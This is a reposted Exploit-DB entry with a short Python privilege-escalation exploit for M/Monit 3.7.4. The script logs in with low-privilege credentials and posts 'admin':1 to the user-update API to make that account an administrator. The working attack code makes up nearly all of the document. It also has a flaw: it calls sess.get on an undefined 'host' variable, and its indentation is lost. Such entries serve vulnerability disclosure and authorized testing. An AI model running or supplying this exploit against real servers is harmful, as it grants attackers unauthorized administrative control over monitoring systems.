M/Monit 3.7.4 – Privilege Escalation - 体验盒子

作者： Dolev Farhi

日期： 2020-11-19

类别：

webapps

平台：

multiple

来源：https://www.exploit-db.com/exploits/49080/

# Title: M/Monit 3.7.4 - Privilege Escalation
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(host)

def login():
print('Attempting to login...')
data = {
'z_username':username,
'z_password':password
}
headers = {
'Content-Type':'application/x-www-form-urlencoded'
}

resp = sess.post(url + '/z_security_check', data=data, headers=headers)
if resp.ok:
print('Logged in successfully.')
else:
print('Could not login.')
sys.exit(1)

def privesc():
data = {
'uname':username,
'fullname':username,
'password':password,
'admin':1
}
resp = sess.post(url + '/api/1/admin/users/update', data=data)

if resp.ok:
print('Escalated to administrator.')
else:
print('Unable to escalate to administrator.')

return

if __name__ == '__main__':
login()
privesc()